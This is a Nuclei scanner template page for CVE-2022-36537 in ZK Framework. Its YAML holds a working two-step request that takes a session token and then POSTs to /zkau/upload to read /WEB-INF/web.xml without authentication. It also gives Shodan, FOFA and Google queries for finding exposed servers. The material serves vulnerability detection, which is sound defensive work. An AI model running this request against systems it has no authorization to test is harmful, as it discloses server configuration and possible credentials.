Skip to content
Nuclei Templates

ZK Framework - Information Disclosure

ID: CVE-2022-36537

Severity: high

Author: theamanrawat

Tags: cve,cve2022,zk-framework,exposure,unauth,kev,intrusive,zkoss

Description

Section titled “Description”

ZK Framework 9.6.1, 9.6.0.1, 9.5.1.3, 9.0.1.2 and 8.6.4.1 is susceptible to information disclosure. An attacker can access sensitive information via a crafted POST request to the component AuUploader and thereby possibly obtain additional sensitive information, modify data, and/or execute unauthorized operations.

YAML Source

Section titled “YAML Source”
id: CVE-2022-36537


info:
  name: ZK Framework - Information Disclosure
  author: theamanrawat
  severity: high
  description: |
    ZK Framework 9.6.1, 9.6.0.1, 9.5.1.3, 9.0.1.2 and 8.6.4.1 is susceptible to information disclosure. An attacker can access sensitive information via a crafted POST request to the component AuUploader and thereby possibly obtain additional sensitive information, modify data, and/or execute unauthorized operations.
  impact: |
    The vulnerability can lead to the exposure of sensitive data, such as credentials or internal system information.
  remediation: |
    Apply the latest security patches or updates provided by the ZK Framework to fix the information disclosure vulnerability.
  reference:
    - https://github.com/Malwareman007/CVE-2022-36537/
    - https://tracker.zkoss.org/browse/ZK-5150
    - https://nvd.nist.gov/vuln/detail/CVE-2022-36537
    - https://www.bleepingcomputer.com/news/security/cisa-warns-of-hackers-exploiting-zk-java-framework-rce-flaw/
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2022-36537
    cwe-id: CWE-200
    epss-score: 0.95859
    epss-percentile: 0.99401
    cpe: cpe:2.3:a:zkoss:zk_framework:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: zkoss
    product: zk_framework
    shodan-query:
      - http.title:"Server backup manager"
      - http.title:"server backup manager"
    fofa-query: title="server backup manager"
    google-query: intitle:"server backup manager"
  tags: cve,cve2022,zk-framework,exposure,unauth,kev,intrusive,zkoss


http:
  - raw:
      - |
        GET /login.zul HTTP/1.1
        Host: {{Hostname}}
      - |
        POST /zkau/upload?uuid=101010&dtid={{dtid}}&sid=0&maxsize=-1 HTTP/1.1
        Host: {{Hostname}}
        Accept-Encoding: gzip, deflate
        Accept: */*
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryCs6yB0zvpfSBbYEp
        Content-Length: 154


        ------WebKitFormBoundaryCs6yB0zvpfSBbYEp
        Content-Disposition: form-data; name="nextURI"


        /WEB-INF/web.xml
        ------WebKitFormBoundaryCs6yB0zvpfSBbYEp--


    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - <display-name>.*</display-name>
          - |-
            <welcome-file-list>((.|
            )*)welcome-file-list>
          - xml version
          - web-app
        condition: and


      - type: status
        status:
          - 200


    extractors:
      - type: regex
        name: dtid
        group: 1
        regex:
          - "dt:'(.*?)',cu:"
        internal: true
# digest: 4b0a00483046022100ac1da2aeba25490974a17b330976105cd9d45a52adff6d20bc7e8a2d74216891022100c585a92549ebeefe1af3de97c7057e8c4415a1c48912f0ca8d69c18243fb5ef4:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-36537.yaml"

View on Github